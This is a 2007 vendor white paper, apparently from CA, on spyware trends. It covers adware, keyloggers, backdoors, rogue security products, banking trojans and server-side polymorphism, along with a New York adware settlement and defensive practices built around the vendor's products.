22 August 07
The Latest Trends in Spyware
Spyware is among the more insidious computer security threats. It's imperative that organizations guard against spyware and other similar types of malicious software or risk loss of sensitive corporate data, diminished performance of desktop devices, servers, and networks; wasted bandwidth, potentially lost business and angry customers, and possible legal liability.
What exactly is spyware? The CA Security Advisor Glossary defines it as "any application that employs a user's network connection in the background without their permission or knowledge, and gathers or transmits information on the user or their behavior."1 Many spyware applications collect referrer data (information from the user's web browser that reveals the URL of the page that was linked from), IP address, and system information such as time of visit, type of browser used, operating system and platform, and CPU speed, the glossary says. The term Spyware also has a broad definition in the Security Industry which means "any software that is installed without obtaining user permission and awareness."
Spyware can secretly record personal information through multiple techniques including logging keystrokes, recording web browsing history and scanning documents on a computer's hard drive, according to the online encyclopedia Wikipedia. In fact, one of the biggest problems with spyware is that some programs are capable of gathering personal information, including user logons and passwords, logs of website visits, and online search strings. This can lead to other problems such as identity theft, which in turn can result in legal action, fines from failing to comply with regulations and privacy laws, and bad publicity.
Theft of personal data can also give criminals access to vital business information such as customer records, product development histories, and intellectual property. This white paper explores some of the latest trends with spyware, including the changing motivations of spyware writers, emerging forms of the software, and steps organizations can take to protect themselves.
A Significant Threat
Spyware is a real and serious threat to organizations as well as individual computer users. The 2006 Global Security Survey of chief security officers and chief information security officers by Deloitte Touche Tohmatsu showed that 48 percent of the executives said their organization had experienced external breaches involving spyware.2 Only viruses/worms (63 percent) and phishing/pharming (51 percent) were cited more frequently. Other types of incidents, such as social engineering, hacking, denial of service, web application breaches, and wireless network breaches, were considerably less common, according to the survey.
Using the broad definition of Spyware, it can exist in several different forms, such as adware. The CA Security Advisor Glossary defines adware as software that displays pop-up or pop-under advertisements when the primary user interface is not visible.3 It's the most prevalent type of spyware, accounting for 45 percent of known spyware threats in 2006, according to the CA 2007 Security Outlook Report. Adware is generally used to push advertising in front of users based on the types of websites they've visited.
Another type of spyware is a keylogger, which the CA Security Advisor Glossary defines as a software program that surreptitiously records keystrokes and then makes the log of keyboard activity available to someone other than the logged user.4 Keyloggers are common in trojans, but are sometimes used in the payloads of viruses. Keyloggers are also available in commercial form. Commercial keyloggers are sometimes used surreptitiously to spy on unknowing users. When a keylogger is installed all information typed into the keyboard is at risk including passwords, account numbers, and other personally identifiable information.
Spyware also appears in the form of backdoors. According to the CA glossary, these are programs that surreptitiously allow access to a computer's files and other resources through a network connection.5 An intruder could use these programs to exploit a software vulnerability and open it to future access.
"Virtually any type of software can have a spyware component," says Benjamin Googins, senior research engineer at CA. "For example, toolbars are not always classified as spyware, but many of the ones detected by CA Anti-Spyware covertly collect user data, like search queries entered in other search boxes."
Michael Johnson, research engineer at CA, says there are many ways that seemingly innocuous software can be malicious. "To the average user, what the software is doing is only what the user can see," Johnson says. He says 'behind the scenes' software can be used to perform numerous malicious activities. Software that appears harmless can be reconfigured to become malicious later, Johnson says. "Some toolbars contain malicious capability in the code such as changing your start page, and automatic updating without the ability to turn it off," he says.
What's especially dangerous about spyware is that it can be installed on a device without the user knowing about it. Programs can infiltrate a computer when a user visits a particular website, shares files with coworkers or business partners, or downloads free software such as a screen saver. Once spyware is on a computer it can be hard to remove.
In general, the motivation behind malware has changed, says Googins. "In the past, malware authors - groups or individuals - were content with rewards like glory, proving computer savvy among peers, and notoriety," he says. This motivation has not gone away, he says, but there has been an explosion in financially motivated attacks.
The latest trends in unwanted programs are directly reflected in the change in motivation from notoriety to financial gain, Googins says. "There has been a drive toward 'silent' programs, or those programs that go unnoticed for extended periods of time, allowing them to covertly collect personal information to then be used for financial gain," he says. This software, which Googins says is commonly labeled a trojan, leaves the host system running normally. It doesn't cause any damage, but quietly spies unbeknownst to the user.
The financial motivation has also led to the growth of "noisy" spyware software such as adware, toolbars, and hijackers. "With adware, the purpose is to show ads to the user while hiding the fact that the ads are initiated by the resident software, possibly hoping to confuse users into believing the ads are derived from the websites they are visiting," Googins says. "To the average user, the difference between ads triggered by a website or software resident on their system is indistinguishable, so infected users are often unaware of it."
There have been a number of legal and government actions against companies that use adware, Googins says. For example, the New York State attorney general's office went after several companies for using adware created by a company called Direct Revenue. The state in January 2007 reached a settlement with three companies, Travelocity.com LP, Cingular Wireless LLC, and Priceline.com Inc., in which the companies agreed they would not use adware that's covertly installed.6
The settlement required that each company deliver online ads only through companies that provide to consumers full disclosure of the name of the applicable adware program and any bundled software; brand each advertisement with a prominent and easily identifiable brand name or icon; fully describe the adware and obtain consumer consent to both download and run the adware; make it practicable for consumers to remove the adware from their computers; obtain consent to continue serving ads to legacy users; and require their affiliates to meet all of these same requirements. The companies also must investigate, prior to contracting with a company to deliver online ads, how the ads are delivered.
Pursuing companies that use adware is a new development, Googins says. "In the past, the creators of adware were the target of legal and governmental challenges," he says. "Going after the advertisers puts pressure on them to be responsible in what methods they choose to display ads to users. In the coming year we may see more companies re-evaluating their use of adware as a means to advertise."
Another, more recent development is the use of the "blended threat" by malware authors, according to Googins. Also related to the trend toward financially motivated attacks, this involves a mixture of techniques and software, he says.
In addition, over the last few years the CA Security Advisor team has seen a rise in the number of what security experts commonly call "rogue security products," Googins says. As Internet use has grown, "so have the number of security-related issues that users have to content with," he says. "Opportunistic malware authors seem to be playing off user security fears by pushing useless products that generally have a pretty user interface, but nothing 'under the hood.' In other words, they look good but offer no security value."
Oftentimes these programs are installed by trojan downloaders and auto-run when the user starts his system, Googins says. They are programmed to report erroneous security problems, he says, often with messages that compel the user to buy a solution to remove the "threat."
Googins says CA detects "whole families of spyware that are intent on stealing financial data, like bank login information." For example, the Win32/Bancos family includes many varied trojans, which attempt to steal sensitive information that can be used to gain unauthorized access to bank accounts via Internet banking, according to CA's Virus Information Center.7 Most variants target Brazilian banks. There are more than 2,000 distinct variants of this trojan, with more being discovered every day, the center reports.
Another example is the Phishbank family.8 According to the CA Virus Information Center, this family includes HTML web pages and email messages that attempt to lure people to phishing pages, "using obfuscated URLs intended to obscure the page's true location and intent." The obscured URLs are intended to be an aid in creating a believable forgery of a real web page such as an online banking page, the center says. "The forged page can then entice users to enter confidential information, which can be captured by the forger."
A new trend is server-side polymorphism, Googins says. "In other words, the server where the malware is distributed actually has the capability of obfuscating code so that it is not easily detected by security products," he says. According to CA's Security Advisor Research Blog of March 8, 2007, "we are expecting a further increase in the number of malware authors using more traditional methods of distribution and other functionality (such as stealth in the form of polymorphism and rootkits).
Security experts are seeing "lots of software that changes its file names, locations and contents to hide itself," says Johnson. "Much software changes on the server instead of the client's machine," he says. The software updates itself into malicious software, even though when first installed on the client's machine it was innocuous, Johnson says.
Building a Defense
CA was a founding member of the Anti-Spyware Coalition in 2005, Googins says. "CA has played an active role by contributing to the Anti-Spyware Coalition, including the conflict resolution guidelines, risk criteria, and best practices," he says. CA has also been actively involved in helping to establish software standards related to unwanted software.
"CA has set its own standards for software developers through its Spyware Scorecard," Googins says. The first version of the Anti-Spyware Scorecard was published in December 2003, creating the first published standards for software behavior, according to Googins. He says that eventually helped lead to the creation of industry-wide standards.
There is much that organizations can do to protect themselves against spyware and other malware, both from a policy and technology standpoint. "Organizations should employ a range of practices that cover everything from the gateway to endpoints on the network, to effectively address the wide range of threats," Googins says.
An element of dealing with the threat of spyware is educating all computer users in the organization about spyware, what it is, how it gets installed, what it is capable of doing, and what to do if they suspect they have it. That can include training programs on how to spot suspicious activity and avoid questionable sites on the web, staying away from downloading software bundles, not clicking on attachments from unknown senders, keeping the system updated with the latest security patches, etc. Googins says "The reality, though, is that training employees can be costly and at times not very effective. A system administrator needs to take a comprehensive approach to securing the network. Anti-virus and anti-spyware products can identify software based threats residing on the user's machine by utilizing signature based technology. Another component of a comprehensive security plan involves the use of a firewall to protect against spyware. Firewalls nicely complement anti-virus and anti-spyware products by adding a layer of protection that identifies potential threats through a behavior and general software characteristic identification method. In addition to deploying a firewall at the gateway which is common practice today, one can now deploy network and application firewall functionality to each host using CA's HIPS technology. HIPS technology provides proactive protections against unknown threats which nicely compliment anti-virus and anti-spyware technologies.
In addition to commercial security offerings, there are free products available that can remove a variety of unwanted software, Googins says. "The problem is that these programs typically are not as up to date as commercially produced products that have a full-time staff dedicated to identifying threats," he says. "Unwanted software changes rapidly, and for a security product to be relevant it must have people actively updating it as threats emerge in a timely fashion."
Indications are that these threats will continue to emerge. "Given the apparent intent and functionality of spyware today, the risks of spyware should be taken seriously by businesses," Googins says.
1"Spyware," Security Advisor Glossary http://www.totaldefense.com/support/security-advisor/glossary.aspx#S
2"Global Security Survey," Deloitte Touche Tohmatsu, 2006. http://www.deloitte.com/dtt/research/0,1015,sid%253D54002%2526cid%253D124927,00.html#survey
3"Adware," Security Advisor Glossary http://www.totaldefense.com/support/security-advisor/glossary.aspx#A
4"Key Logger," Security Advisor Glossary http://www.totaldefense.com/support/security-advisor/glossary.aspx#K
5"Backdoor," Security Advisor Glossary http://www.totaldefense.com/support/security-advisor/glossary.aspx#B
6"Groundbreaking Settlements Hold Online Advertisers Responsible for Displaying Ads through Deceptively Installed 'Adware' Programs," Office of the New York State Attorney General http://www.oag.state.ny.us/press/2007/jan/jan29b_07.html
7"Bancos," CA Virus Information Center http://www.ca.com/securityadvisor/virusinfo/virus.aspx?id=53476
8"Latest Phishing Scams," CA Virus Information Center http://gsa.ca.com/virusinfo/virus.aspx?id=38328